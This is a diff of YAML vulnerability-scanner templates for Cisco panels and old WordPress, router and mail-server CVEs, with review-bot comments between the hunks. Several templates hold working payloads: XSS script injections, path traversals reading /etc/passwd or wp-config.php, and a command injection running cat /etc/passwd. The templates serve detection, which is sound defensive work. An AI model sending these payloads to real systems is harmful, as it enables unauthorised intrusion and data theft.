b/poc/cisco/cisco-network-config.yaml 
@@ -0,0 +1,24 @@ +id: cisco-network-config + +info: + name: Cisco System Network Configuration Exposure + author: DhiyaneshDk + severity: low + reference: https://www.exploit-db.com/ghdb/5430 + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration" + + matchers-condition: and + matchers: + - type: word + words: + - "Network Configuration" + part: body + + - type: status + status: + - 200 diff --git a/poc/cisco/cisco-prime-infrastructure-952.yaml b/poc/cisco/cisco-prime-infrastructure-952.yaml deleted file mode 100644 index 1ef40b53b8..0000000000 --- a/poc/cisco/cisco-prime-infrastructure-952.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: cisco-prime-infrastructure - -info: - name: Cisco Prime Infrastructure - author: dhiyaneshDk - severity: info - metadata: - shodan-query: 'http.title:"prime infrastructure"' - tags: panel,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/webacs/pages/common/login.jsp" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'productName = "Prime Infrastructure"' - - "Cisco " - - - type: status - status: - - 200 diff --git a/poc/cisco/cisco-prime-infrastructure-954.yaml b/poc/cisco/cisco-prime-infrastructure-954.yaml new file mode 100644 index 0000000000..2b4d60a237 --- /dev/null +++ b/poc/cisco/cisco-prime-infrastructure-954.yaml @@ -0,0 +1,26 @@ +id: cisco-prime-infrastructure + +info: + name: Cisco Prime Infrastructure + author: dhiyaneshDk + severity: info + metadata: + shodan-query: http.title:"prime infrastructure" + tags: panel,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/webacs/pages/common/login.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'productName = "Prime Infrastructure"' + - "Cisco " + + - type: status + status: + - 200 diff --git a/poc/cisco/cisco-sd-wan-955.yaml b/poc/cisco/cisco-sd-wan-955.yaml new file mode 100644 index 0000000000..6376c9a8ca 
--- /dev/null +++ b/poc/cisco/cisco-sd-wan-955.yaml @@ -0,0 +1,25 @@ +id: cisco-sd-wan + +info: + name: Cisco SD-WAN panel + author: z3bd + severity: info + reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj + tags: panel,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + words: + - "SD-Wan Center" + part: body \ No newline at end of file diff --git a/poc/cisco/cisco-sd-wan-957.yaml b/poc/cisco/cisco-sd-wan-957.yaml deleted file mode 100644 index 0f9113cc89..0000000000 --- a/poc/cisco/cisco-sd-wan-957.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: cisco-sd-wan - -info: - name: Cisco SD-WAN panel - author: z3bd - severity: info - reference: - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj - tags: panel,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers-condition: and - matchers: - - - type: status - status: - - 200 - - - type: word - words: - - "SD-Wan Center" - part: body \ No newline at end of file diff --git a/poc/cisco/cisco-secure-desktop-962.yaml b/poc/cisco/cisco-secure-desktop-962.yaml deleted file mode 100644 index dda557dd62..0000000000 --- a/poc/cisco/cisco-secure-desktop-962.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: cisco-secure-desktop - -info: - name: Cisco Secure Desktop - author: pdteam - severity: info - tags: cisco,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/CACHE/sdesktop/install/start.htm" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - words: - - "Installation" - - "WebLaunch" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/poc/cisco/cisco-security-details-963.yaml b/poc/cisco/cisco-security-details-963.yaml deleted file mode 100644 index 8ebd1577a1..0000000000 
--- a/poc/cisco/cisco-security-details-963.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: cisco-security-details - -info: - name: Cisco Meraki cloud & Security Appliance details - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6708 - tags: panel,cisco - -requests: - - method: GET - path: - - '{{BaseURL}}/#connection' - - matchers-condition: and - matchers: - - type: word - words: - - 'Your client connection' - - type: status - status: - - 200 diff --git a/poc/cisco/cisco-security-details.yaml b/poc/cisco/cisco-security-details.yaml index 8ddd313415..8ebd1577a1 100644 --- a/poc/cisco/cisco-security-details.yaml +++ b/poc/cisco/cisco-security-details.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6708 - tags: cisco + tags: panel,cisco requests: - method: GET diff --git a/poc/cisco/cisco-smi-exposure-970.yaml b/poc/cisco/cisco-smi-exposure-970.yaml index 212bbf0f1b..c5a6584dd8 100644 --- a/poc/cisco/cisco-smi-exposure-970.yaml +++ b/poc/cisco/cisco-smi-exposure-970.yaml 
@@ -4,17 +4,17 @@ info: name: Cisco Smart Install Endpoints Exposure author: dwisiswant0 severity: info - description: | - This template attempts & supports the detection part only by - connecting to the specified Cisco Smart Install port and determines - if it speaks the Smart Install Protocol. Exposure of SMI to - untrusted networks can allow complete compromise of the switch. + description: Cisco Smart Install endpoints were discovered. Exposure of SMI to untrusted networks could allow complete compromise of the switch. reference: - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53 - https://github.com/Sab0tag3d/SIET + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: network,cisco,smi,exposure network: @@ -24,10 +24,12 @@ network: host: - "{{Hostname}}" - - "{{Hostname}}:4786" + - "{{Host}}:4786" matchers: - type: word encoding: hex words: - "000000040000000000000003000000080000000100000000" + +# Enhanced by mp on 2022/03/30 diff --git a/poc/cisco/cisco-smi-exposure-972.yaml b/poc/cisco/cisco-smi-exposure-971.yaml similarity index 100% rename from poc/cisco/cisco-smi-exposure-972.yaml rename to poc/cisco/cisco-smi-exposure-971.yaml diff --git a/poc/cisco/cisco-systems-login-973.yaml b/poc/cisco/cisco-systems-login-973.yaml new file mode 100644 index 0000000000..25607b3bbf --- /dev/null +++ b/poc/cisco/cisco-systems-login-973.yaml 
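Review bot: The added `classification` block in cisco-smi-exposure-970.yaml gives `cvss-score: 5.3` with `C:L`, but `severity: info` just above it is unchanged, so the template now carries two different ratings. Pick one: `severity: medium` to match the vector, or drop the score if this is meant as a pure protocol-detection result. In the second hunk the switch to `{{Host}}:4786` is right, but the first host entry `{{Hostname}}` stays and will probe whatever port the input carried. A comment such as `# 4786/tcp is the Smart Install port; the first entry only helps when the input already names it` would explain why both are kept.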
@@ -0,0 +1,25 @@ +id: cisco-systems-login + +info: + name: Cisco Systems Login + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan-query: 'http.title:"Cisco Systems Login"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Systems Login" + + - type: status + status: + - 200 diff --git a/poc/cisco/cisco-systems-login-975.yaml b/poc/cisco/cisco-systems-login-975.yaml deleted file mode 100644 index 96ae7b9ee4..0000000000 --- a/poc/cisco/cisco-systems-login-975.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: cisco-systems-login - -info: - name: Cisco Systems Login - author: dhiyaneshDk,idealphase - severity: info - metadata: - shodan-query: http.title:"Cisco Systems Login" - google-query: intitle:"Cisco Systems Login" - tags: panel,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Cisco Systems Login" - - - type: status - status: - - 200 - - extractors: - - type: regex - group: 1 - regex: - - '" - part: body + - type: word part: header words: - text/html + - type: status status: - 200 - -# Enhanced by mp on 2022/02/21 +# digest: 490a0046304402202ba7daa26a5fc43e928478cd0bb41f984b038554dfbb28f4890464f2d2957ac802201d20b2c66c1505867a2acb23a34256a7d8cc2faabc161373f2dc452c1260e110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2012-4768.yaml b/poc/cve/CVE-2012-4768.yaml index 7d55437591..53376bfbe0 100644 --- a/poc/cve/CVE-2012-4768.yaml +++ b/poc/cve/CVE-2012-4768.yaml 
@@ -1,32 +1,50 @@ id: CVE-2012-4768 + info: - name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting + name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + remediation: | + Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/78422 classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2012-4768 - tags: cve,cve2012,wordpress,xss,wp-plugin -requests: + cwe-id: CWE-79 + epss-score: 0.00922 + epss-percentile: 0.81121 + cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: mikejolley + product: download_monitor + framework: wordpress + tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress + +http: - method: GET path: - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + - type: word part: header words: - text/html + - type: status status: - 200 - -# Enhanced by mp on 2022/02/21 +# digest: 4a0a00473045022100a811b98b0ef138d5be2fd89bf6dd2a3c4616309c57583130f1783c44cd5a35450220679f9e9db3efbc9ed3235239e5b210b08b1e3269a7af04417434e5fcc5bf6462:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2013-5528.yaml b/poc/cve/CVE-2013-5528.yaml index 7d9cb08ce8..054a82604c 100644 --- a/poc/cve/CVE-2013-5528.yaml +++ b/poc/cve/CVE-2013-5528.yaml @@ -3,35 +3,25 @@ id: CVE-2013-5528 info: name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal author: daffainfo - severity: medium + severity: high description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 - remediation: | - Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/40887 - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 + - http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/ classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N - cvss-score: 4 cve-id: CVE-2013-5528 - cwe-id: CWE-22 - epss-score: 0.00565 - epss-percentile: 0.75227 - cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cisco - product: unified_communications_manager - tags: cve,cve2013,lfi,cisco,edb + tags: cve,cve2013,lfi,cisco -http: +requests: - method: GET path: - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: + - type: regex regex: - "root:.*:0:0:" @@ -39,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e40cf01d702727f203c87effa4494b88a1b47a9e12b757c887756f011c79ba39022026d9e052a5913633d04c92307373c167fceb68b9c4787dfe79720316c5a8000a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/02/24 
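Review bot: Raising `severity` to `high` in the first CVE-2013-5528 hunk does not fit the rest of the template: the description says the flaw is reachable by remote authenticated users, and the removed classification rated it 4 with `Au:S`. The request is sent without credentials, so a match may not correspond to the condition the CVE describes; I would keep `severity: medium` and the `cvss-metrics` and `cwe-id: CWE-22` lines. The unchanged reference `https://nvd.nist.gov/vuln/detail/CVE-2014-3120` names a different CVE id than the template and should presumably end in `CVE-2013-5528`. CVE-2014-4940.yaml gets the same medium-to-high change with its classification removed.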
diff --git a/poc/cve/CVE-2013-5979.yaml b/poc/cve/CVE-2013-5979.yaml index 7ad29aa3ce..1149dd7311 100644 --- a/poc/cve/CVE-2013-5979.yaml +++ b/poc/cve/CVE-2013-5979.yaml @@ -1,5 +1,4 @@ id: CVE-2013-5979 - info: name: Xibo 1.2.2/1.4.1 - Directory Traversal author: daffainfo @@ -13,19 +12,15 @@ info: classification: cve-id: CVE-2013-5979 tags: cve,cve2013,lfi - requests: - method: GET path: - "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 diff --git a/poc/cve/CVE-2013-6281.yaml b/poc/cve/CVE-2013-6281.yaml index d08cfdb755..7ab90646ab 100644 --- a/poc/cve/CVE-2013-6281.yaml +++ b/poc/cve/CVE-2013-6281.yaml 
@@ -1,29 +1,41 @@ id: CVE-2013-6281 + info: - name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS + name: WordPress Spreadsheet - Cross-Site Scripting author: random-robbie severity: medium description: | - The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability. + WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. + remediation: | + Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ - https://wordpress.org/plugins/dhtmlxspreadsheet/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 + - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2013-6281 cwe-id: CWE-79 + epss-score: 0.00209 + epss-percentile: 0.5874 + cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: - google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet - verified: "true" - tags: cve,cve2013,wordpress,xss,wp-plugin,wp -requests: + verified: true + max-request: 1 + vendor: dhtmlx + product: dhtmlxspreadsheet + framework: wordpress + google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet + tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin + +http: - raw: - | GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word 
@@ -32,10 +44,13 @@ requests: - "page: ''" - "dhx_rel_path" condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a004730450221009258243f6f89c6c0f9abe00718f894f072068078fd7fa622711c2f69e9bc8d510220646c38aaefdb3381b352305dd20213fa4934849febbdabb7ddad04c51ceadd82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2013-7240.yaml b/poc/cve/CVE-2013-7240.yaml index 6ad0335e9a..c817f7a100 100644 --- a/poc/cve/CVE-2013-7240.yaml +++ b/poc/cve/CVE-2013-7240.yaml 
@@ -3,21 +3,32 @@ id: CVE-2013-7240 info: name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + remediation: | + Update to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used. reference: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/ - http://seclists.org/oss-sec/2013/q4/570 + - http://seclists.org/oss-sec/2013/q4/566 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2013-7240 cwe-id: CWE-22 - tags: cve,cve2013,wordpress,wp-plugin,lfi + epss-score: 0.23987 + epss-percentile: 0.96126 + cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: westerndeal + product: advanced_dewplayer + google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" + tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php' 
@@ -25,16 +36,15 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_HOST" - "The base configurations of the WordPress" - part: body condition: and - type: status status: - 200 - -# Enhanced by mp on 2022/02/24 +# digest: 4a0a00473045022003fbde35c84873598fcc4a0e096edcbd88b729b21b95c3cda42383e4832bbd56022100809a35e79e694fe5f91ab004c92b24a914ead823581da6aae2a824b7123745ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2014-1203.yaml b/poc/cve/CVE-2014-1203.yaml index 913e32045e..744b0ec237 100644 --- a/poc/cve/CVE-2014-1203.yaml +++ b/poc/cve/CVE-2014-1203.yaml @@ -1,12 +1,9 @@ id: CVE-2014-1203 - info: name: Eyou E-Mail <3.6 - Remote Code Execution author: pikpikcu severity: critical description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. - remediation: | - Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches. reference: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 @@ -16,16 +13,8 @@ info: cvss-score: 9.8 cve-id: CVE-2014-1203 cwe-id: CWE-77 - epss-score: 0.02045 - epss-percentile: 0.87728 - cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: eyou - product: eyou - tags: seclists,rce,eyou - -http: + tags: rce,eyou +requests: - raw: - | POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 
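Review bot: The new `tags: rce,eyou` line in the second CVE-2014-1203 hunk has no `cve` or `cve2014` tag, so tag-based selection of CVE templates will skip this file even though `cve-id` is set. I would write `tags: cve,cve2014,rce,eyou`. The description names the `domain` parameter of `d_ip_login_get.php`, while the request in the context lines posts `type=` to `/webadm/?q=moni_detail.do`; a one-line comment stating which entry point the check exercises would help anyone triaging a hit. The request block continues in the next hunk.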
@@ -33,15 +22,14 @@ http: Content-Type: application/x-www-form-urlencoded type='|cat /etc/passwd||' - matchers-condition: and matchers: - type: regex - part: body regex: - "root:.*:0:0:" - + part: body - type: status status: - 200 -# digest: 490a00463044022053d12c348a221483a7a3d354dcd0f37cf0198da0b99487ac1c83147f2ecb0d0a022039d34a443cb35d077b9e070038aed29a706d02de7e0219dc16fe1860901ca564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/01 diff --git a/poc/cve/CVE-2014-2962.yaml b/poc/cve/CVE-2014-2962.yaml index 2456af7a2e..55347eb471 100644 --- a/poc/cve/CVE-2014-2962.yaml +++ b/poc/cve/CVE-2014-2962.yaml 
@@ -1,25 +1,43 @@ id: CVE-2014-2962 info: - name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal + name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal author: daffainfo severity: high - description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. - reference: https://www.exploit-db.com/exploits/38488 + description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. + reference: + - https://www.kb.cert.org/vuls/id/774788 + - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l + - http://www.kb.cert.org/vuls/id/774788 + - http://www.belkin.com/us/support-article?articleNum=109400 + - https://www.exploit-db.com/exploits/38488/ + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 + cve-id: CVE-2014-2962 + cwe-id: CWE-22 + epss-score: 0.95825 + epss-percentile: 0.99281 + cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: belkin + product: n150_f9k1009_firmware tags: cve,cve2014,lfi,router,firmware,traversal -requests: +http: - method: GET path: - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo" matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 +# digest: 4a0a0047304502200dd2a5cead319121ffaf0a5a1f33bcd326c4373101b2d220bbe38cddcf5df02d022100f6b9132a21f2b0eaf545ce82419e46d7e69e8f5317812e554295b399b8181a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
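Review bot: The added reference `https://nvd.nist.gov/vuln/detail/CVE-2014-2962l` has a stray trailing `l`, so the NVD link will not resolve; it should be `https://nvd.nist.gov/vuln/detail/CVE-2014-2962`. The kb.cert.org advisory is also listed twice, once as `https://www.` and once as `http://www.`, and one of them can go. The `name` says 1.00.08/1.00.09 while the description says firmware before 1.00.08, which is worth reconciling against the advisory.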
diff --git a/poc/cve/CVE-2014-4561.yaml b/poc/cve/CVE-2014-4561.yaml index df0366682b..aaffe503df 100644 --- a/poc/cve/CVE-2014-4561.yaml +++ b/poc/cve/CVE-2014-4561.yaml @@ -1,12 +1,9 @@ id: CVE-2014-4561 - info: - name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting + name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. - remediation: | - Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability. reference: - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 @@ -16,34 +13,23 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4561 cwe-id: CWE-79 - epss-score: 0.00098 - epss-percentile: 0.40523 - cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: ultimate-weather_project - product: ultimate-weather - framework: wordpress - tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth - -http: + tags: cve,cve2014,wordpress,wp-plugin,xss,weather +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - '">' - + part: body - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100d571f0fd3851cac5e9536f1eab9243f3d617ea77f5a2f4c807e87a0a9fa6e3a9022100cbea57a0141cb206370416a15348231e84c67d9fbb8fdf54d6ec16830772ed69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/CVE-2014-4940.yaml b/poc/cve/CVE-2014-4940.yaml index 4892b44bfb..13f17a9af9 100644 --- a/poc/cve/CVE-2014-4940.yaml +++ b/poc/cve/CVE-2014-4940.yaml 
@@ -1,39 +1,26 @@ id: CVE-2014-4940 info: - name: WordPress Plugin Tera Charts - Local File Inclusion + name: WordPress Plugin Tera Charts - Directory Traversal author: daffainfo - severity: medium - description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. - remediation: | - Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability. + severity: high + description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/ classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N - cvss-score: 5 cve-id: CVE-2014-4940 - cwe-id: CWE-22 - epss-score: 0.03891 - epss-percentile: 0.90998 - cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: tera_charts_plugin_project - product: tera-charts - framework: wordpress - google-query: inurl:"/wp-content/plugins/tera-charts" tags: cve,cve2014,wordpress,wp-plugin,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd" matchers-condition: and matchers: + - type: regex regex: - "root:.*:0:0:" 
@@ -42,4 +29,4 @@ http: status: - 200 -# digest: 4a0a0047304502207cfabb76afc34be42d50cb6e83ab3bf5d1b7e8a70f10cd1e1fde6d4a89d2dfcd0221009665fd3be61b1f3846565c5029d19fbf22845e2fdd400713726354127576f78b:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/CVE-2014-4942.yaml b/poc/cve/CVE-2014-4942.yaml index 3bfce6456b..ef0faf2498 100644 --- a/poc/cve/CVE-2014-4942.yaml +++ b/poc/cve/CVE-2014-4942.yaml 
@@ -1,20 +1,39 @@ id: CVE-2014-4942 + info: - name: WP EasyCart - Information Disclosure + name: WordPress EasyCart <2.0.6 - Information Disclosure author: DhiyaneshDk - severity: low + severity: medium description: | - The EasyCart (wp-easycart) plugin before 2.0.6 for WordPress allows remote attackers to obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + remediation: | + Upgrade to WordPress EasyCart version 2.0.6 or later. reference: - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150 - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942 - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 - tags: cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure -requests: + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail= + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 + cve-id: CVE-2014-4942 + cwe-id: CWE-200 + epss-score: 0.01024 + epss-percentile: 0.82108 + cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: levelfourdevelopment + product: wp-easycart + framework: wordpress + tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php" + matchers-condition: and matchers: - type: word 
